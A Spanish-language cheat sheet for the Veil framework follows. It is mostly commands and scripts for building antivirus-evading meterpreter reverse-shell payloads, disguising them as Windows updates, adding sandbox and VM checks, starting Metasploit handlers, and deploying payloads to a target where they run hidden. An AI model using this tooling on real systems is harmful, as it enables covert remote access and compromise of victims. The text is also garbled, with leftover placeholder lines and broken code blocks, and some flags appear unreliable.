Hoja de Referencia de Veil
## Descripción General
Veil es una herramienta diseñada para generar payloads de Metasploit que evaden soluciones antivirus comunes. Es parte del Veil-Framework y se enfoca en la generación y codificación de payloads para evadir la detección de software antivirus y sistemas de protección de endpoints. Veil admite múltiples lenguajes de programación y técnicas de codificación para crear payloads no detectables para pruebas de penetración y operaciones de red team.
⚠️ Advertencia: Utilice Veil solo en entornos que posea o para los que tenga permiso explícito de prueba. El uso no autorizado puede violar términos de servicio o leyes locales. Esta herramienta está destinada únicamente a propósitos legítimos de pruebas de seguridad.
Instalación
Instalación Automatizada
# Clone the repository
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Run the setup script
sudo ./config/setup.sh --force --silent
# Verify installation
./Veil.py --version
```[Placeholder for automated installation instructions]
### Instalación Manual
```bash
# Install dependencies
sudo apt update
sudo apt install -y python3 python3-pip git
# Install Python dependencies
pip3 install pycrypto
pip3 install distorm3
pip3 install pefile
pip3 install capstone
# Install additional tools
sudo apt install -y mingw-w64
sudo apt install -y mono-mcs
sudo apt install -y golang-go
# Clone Veil
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Make executable
chmod +x Veil.py
```[Placeholder for manual installation instructions]
### Instalación con Docker
```bash
# Pull Docker image
docker pull mattiasohlsson/veil
# Run Veil in Docker
docker run -it --rm -v $(pwd):/output mattiasohlsson/veil
# Create alias for easier usage
echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc
source ~/.bashrc
```[Placeholder for Docker installation instructions]
### Instalación en Kali Linux
```bash
# Veil is pre-installed on Kali Linux
veil
# If not installed, install via apt
sudo apt update
sudo apt install veil
# Update to latest version
cd /usr/share/veil
sudo git pull
```[Placeholder for Kali Linux installation instructions]
## Uso Básico
### Modo Interactivo
```bash
# Start Veil in interactive mode
./Veil.py
# Or if installed system-wide
veil
# Navigate the menu system
# 1) Veil-Evasion (payload generation)
# 2) Veil-Ordnance (payload delivery)
```[Placeholder for interactive mode instructions]
### Modo de Línea de Comandos
```bash
# List available payloads
./Veil.py -t Evasion --list-payloads
# Generate payload with specific options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate payload with custom options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-dir /tmp/payloads
# Show payload options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --payload-options
```[Placeholder for command line mode instructions]
## Generación de Payloads
### Payloads de Python
```bash
# Python reverse TCP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Python reverse HTTP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Python reverse HTTPS Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Python shell reverse TCP
./Veil.py -t Evasion -p python/shellcode_inject/flat --ip 192.168.1.100 --port 4444
# Python with custom encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
```[Placeholder for Python payload generation instructions]
### Payloads de C#
```bash
# C# reverse TCP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# C# reverse HTTP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80
# C# reverse HTTPS Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443
# C# shellcode injection
./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ip 192.168.1.100 --port 4444
# C# with process hollowing
./Veil.py -t Evasion -p cs/shellcode_inject/hollow --ip 192.168.1.100 --port 4444
```[Placeholder for C# payload generation instructions]
### Payloads de PowerShell
```bash
# PowerShell reverse TCP
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# PowerShell reverse HTTP
./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80
# PowerShell reverse HTTPS
./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443
# PowerShell with obfuscation
./Veil.py -t Evasion -p powershell/shellcode_inject/psexec --ip 192.168.1.100 --port 4444
```[Placeholder for PowerShell payload generation instructions]
### Payloads de Go
```bash
# Go reverse TCP
./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Go reverse HTTP
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Go reverse HTTPS
./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Go with custom user agent
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80 --user-agent "Mozilla/5.0"
```[Placeholder for Go payload generation instructions]
## Técnicas Avanzadas de Evasión
### Codificación y Ofuscación
```bash
# Base64 encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
# XOR encoding
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding xor
# AES encryption
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encryption aes
# Multiple encoding layers
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64,xor
# Custom encoding key
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding-key "MySecretKey123"
```[Placeholder for encoding and obfuscation techniques]
### Técnicas Anti-Análisis
```bash
# Sleep before execution
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --sleep 30
# Check for virtual machine
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --vm-check
# Check for debugger
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug-check
# Domain check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --domain-check
# Process check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --process-check
```[Placeholder for anti-analysis techniques]
### Opciones Personalizadas de Payload
```bash
# Custom executable icon
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --icon /path/to/icon.ico
# Custom executable version info
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --version-info "Microsoft Corporation"
# Custom file description
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --file-description "System Update"
# Custom product name
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --product-name "Windows Update"
# Compile as service
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --service
```[Placeholder for custom payload options]
## Métodos de Entrega de Payload
### Generación de Ejecutables
```bash
# Generate Windows executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type exe
# Generate DLL
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type dll
# Generate service executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type service
# Generate shellcode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type shellcode
# Generate PowerShell script
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type ps1
```[Placeholder for executable generation instructions]
### Ordnance (Entrega de Payload)
```bash
# Start Veil-Ordnance
./Veil.py -t Ordnance
# Generate HTA payload
./Veil.py -t Ordnance -p hta/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate macro payload
./Veil.py -t Ordnance -p macro/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate SCT payload
./Veil.py -t Ordnance -p sct/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate JavaScript payload
./Veil.py -t Ordnance -p js/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
```[Placeholder for Ordnance payload delivery instructions]
## Integración con Metasploit
### Configuración de Handler
```bash
# Start Metasploit handler for Veil payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.1.100;
set LPORT 4444;
set ExitOnSession false;
exploit -j"
# Handler for HTTP payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_http;
set LHOST 192.168.1.100;
set LPORT 80;
exploit -j"
# Handler for HTTPS payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_https;
set LHOST 192.168.1.100;
set LPORT 443;
exploit -j"
```[Placeholder for handler setup instructions]
### Scripts de Recursos
```bash
# Create Metasploit resource script
cat > veil_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
EOF
# Use resource script
msfconsole -r veil_handler.rc
# Multi-handler resource script
cat > multi_handler.rc ``<< 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 80
set ExitOnSession false
exploit -j
EOF
```[Placeholder for resource scripts instructions]
## Scripts de Automatización
### Generación de Payloads por Lotes
```bash
#!/bin/bash
# Generate multiple Veil payloads
LHOST="192.168.1.100"
OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
# Array of payload configurations
declare -a PAYLOADS=(
"python/meterpreter/rev_tcp:4444:python_tcp"
"python/meterpreter/rev_http:80:python_http"
"cs/meterpreter/rev_tcp:4445:cs_tcp"
"cs/meterpreter/rev_http:8080:cs_http"
"powershell/meterpreter/rev_tcp:4446:ps_tcp"
"go/meterpreter/rev_tcp:4447:go_tcp"
)
echo "[+] Generating Veil payloads..."
echo "[+] LHOST: $LHOST"
echo "[+] Output directory: $OUTPUT_DIR"
for payload_config in "$\\\{PAYLOADS[@]\\\}"; do
IFS=':' read -r payload port name <<< "$payload_config"
echo "[+] Generating $name ($payload:$port)"
./Veil.py -t Evasion \
-p "$payload" \
--ip "$LHOST" \
--port "$port" \
--output-dir "$OUTPUT_DIR" \
--output-name "$name" \
--force
if [ $? -eq 0 ]; then
echo " ✓ Success: $name"
else
echo " ✗ Failed: $name"
fi
done
echo "[+] Payload generation completed"
echo "[+] Generated files:"
ls -la "$OUTPUT_DIR"
# Generate Metasploit resource script
cat >`` "$OUTPUT_DIR/handlers.rc" << EOF
# Metasploit handlers for generated payloads
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 80
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4445
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 8080
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4446
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4447
set ExitOnSession false
exploit -j
EOF
echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc"
```[Placeholder for batch payload generation instructions]
### Script de Prueba de Payload
[Placeholder for payload testing script instructions]```bash
#!/bin/bash
# Test generated payloads against antivirus
PAYLOAD_DIR="$1"
VIRUSTOTAL_API_KEY="your_api_key_here"
if [ -z "$PAYLOAD_DIR" ]; then
echo "Usage: $0 <payload_directory>"
exit 1
fi
if [ ! -d "$PAYLOAD_DIR" ]; then
echo "Error: Directory not found: $PAYLOAD_DIR"
exit 1
fi
echo "[+] Testing payloads in: $PAYLOAD_DIR"
# Function to upload to VirusTotal
upload_to_vt() \\\\{
local file="$1"
local filename=$(basename "$file")
echo "[+] Uploading $filename to VirusTotal..."
response=$(curl -s -X POST \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
-F "file=@$file" \
"https://www.virustotal.com/api/v3/files")
if [ $? -eq 0 ]; then
scan_id=$(echo "$response"|jq -r '.data.id')
echo " Scan ID: $scan_id"
echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
else
echo " Upload failed"
fi
\\\\}
# Function to check scan results
check_vt_results() \\\\{
local scan_id="$1"
local filename="$2"
echo "[+] Checking results for $filename..."
response=$(curl -s -X GET \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
"https://www.virustotal.com/api/v3/analyses/$scan_id")
if [ $? -eq 0 ]; then
status=$(echo "$response"|jq -r '.data.attributes.status')
if [ "$status" = "completed" ]; then
stats=$(echo "$response"|jq -r '.data.attributes.stats')
malicious=$(echo "$stats"|jq -r '.malicious')
suspicious=$(echo "$stats"|jq -r '.suspicious')
undetected=$(echo "$stats"|jq -r '.undetected')
echo " Status: $status"
echo " Malicious: $malicious"
echo " Suspicious: $suspicious"
echo " Undetected: $undetected"
echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
else
echo " Status: $status (still processing)"
fi
else
echo " Failed to get results"
fi
\\\\}
# Upload all executables
echo "[+] Uploading payloads..."
for file in "$PAYLOAD_DIR"/*.exe; do
if [ -f "$file" ]; then
upload_to_vt "$file"
sleep 15 # Rate limiting
fi
done
echo "[+] Waiting for scans to complete..."
sleep 300 # Wait 5 minutes
# Check results
if [ -f "$PAYLOAD_DIR/vt_scans.txt" ]; then
echo "filename,malicious,suspicious,undetected" > "$PAYLOAD_DIR/detection_results.csv"
while IFS=':' read -r filename scan_id; do
check_vt_results "$scan_id" "$filename"
sleep 15 # Rate limiting
done < "$PAYLOAD_DIR/vt_scans.txt"
echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"
else
echo "[-] No scans to check"
fi
```### Script de Despliegue de Payload
```bash
#!/bin/bash
# Deploy Veil payloads for testing
PAYLOAD_DIR="$1"
TARGET_HOST="$2"
TARGET_USER="$3"
if [ $# -ne 3 ]; then
echo "Usage: $0 <payload_directory> <target_host> <target_user>"
exit 1
fi
echo "[+] Deploying payloads to $TARGET_HOST"
# Create remote directory
ssh "$TARGET_USER@$TARGET_HOST" "mkdir -p /tmp/test_payloads"
# Copy payloads
for file in "$PAYLOAD_DIR"/*.exe; do
if [ -f "$file" ]; then
filename=$(basename "$file")
echo "[+] Copying $filename..."
scp "$file" "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
if [ $? -eq 0 ]; then
echo " ✓ Copied successfully"
else
echo " ✗ Copy failed"
fi
fi
done
# Create execution script
cat > /tmp/execute_payloads.ps1 << 'EOF'
# PowerShell script to execute payloads
$payloadDir = "C:\tmp\test_payloads"
$logFile = "$payloadDir\execution_log.txt"
Get-ChildItem -Path $payloadDir -Filter "*.exe"|ForEach-Object \\\\{
$payload = $_.FullName
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
Write-Host "[+] Executing: $($_.Name)"
Add-Content -Path $logFile -Value "$timestamp - Executing: $($_.Name)"
try \\\\{
Start-Process -FilePath $payload -WindowStyle Hidden
Add-Content -Path $logFile -Value "$timestamp - Success: $($_.Name)"
\\\\}
catch \\\\{
Add-Content -Path $logFile -Value "$timestamp - Failed: $($_.Name) - $($_.Exception.Message)"
\\\\}
Start-Sleep -Seconds 5
\\\\}
EOF
# Copy execution script
scp /tmp/execute_payloads.ps1 "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
echo "[+] Deployment completed"
echo "[+] To execute payloads on target:"
echo " ssh $TARGET_USER@$TARGET_HOST"
echo " powershell -ExecutionPolicy Bypass -File /tmp/test_payloads/execute_payloads.ps1"
rm /tmp/execute_payloads.ps1
```## Pruebas de Evasión
### Pruebas de Antivirus
```bash
# Test against Windows Defender
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test defender
# Test against multiple AV engines
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test all
# Generate report
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-report
# Custom AV testing
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-engines "defender,kaspersky,norton"
```### Evasión de Sandbox
```bash
# Generate payload with sandbox evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--sandbox-evasion \
--sleep 60 \
--vm-check \
--debug-check
# Time-based evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--time-check \
--execution-delay 300
# Environment checks
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--domain-check \
--process-check \
--file-check
```## Resolución de Problemas
### Problemas Comunes
#### Problemas de Instalación
```bash
# Fix missing dependencies
sudo apt update
sudo apt install -y python3-dev python3-pip
pip3 install --upgrade pip
# Fix Wine issues (for Windows compilation)
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32
# Fix MinGW issues
sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev
# Reinstall Veil
cd Veil
sudo ./config/setup.sh --force
```#### Errores de Compilación
```bash
# Check compiler availability
which i686-w64-mingw32-gcc
which x86_64-w64-mingw32-gcc
# Fix C# compilation
sudo apt install mono-mcs mono-complete
# Fix Go compilation
export GOPATH=/usr/share/veil/go
export PATH=$PATH:/usr/local/go/bin
# Debug compilation
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
```#### Problemas de Payload
```bash
# Test payload generation
./Veil.py -t Evasion --list-payloads|grep meterpreter
# Check payload options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --payload-options
# Verify output
file /var/lib/veil/output/compiled/payload.exe
strings /var/lib/veil/output/compiled/payload.exe|grep -i meterpreter
# Test payload execution
wine /var/lib/veil/output/compiled/payload.exe
```### Depuración y Registro
```bash
# Enable debug mode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
# Check Veil logs
tail -f /var/lib/veil/output/veil.log
# Verbose output
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --verbose
# Check compilation output
cat /var/lib/veil/output/source/payload.cs
```## Recursos
- [Marco Oficial de Veil](https://github.com/Veil-Framework/Veil)
- [Documentación de Veil](https://veil-framework.github.io/Veil/)
- [Marco Metasploit](https://www.metasploit.com/)
- [Técnicas de Evasión de Antivirus](https://www.sans.org/white-papers/36677/)
- [Mejores Prácticas de Generación de Payload](https://www.offensive-security.com/metasploit-unleashed/)
- [Formato PE de Windows](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format)
- [Técnicas de Ofuscación de Código](https://owasp.org/www-community/attacks/Code_Injection)
---
*Esta hoja de referencia proporciona una referencia completa para usar Veil para generación de payload y evasión de antivirus. Asegúrese siempre de tener la autorización adecuada antes de usar esta herramienta en cualquier entorno.*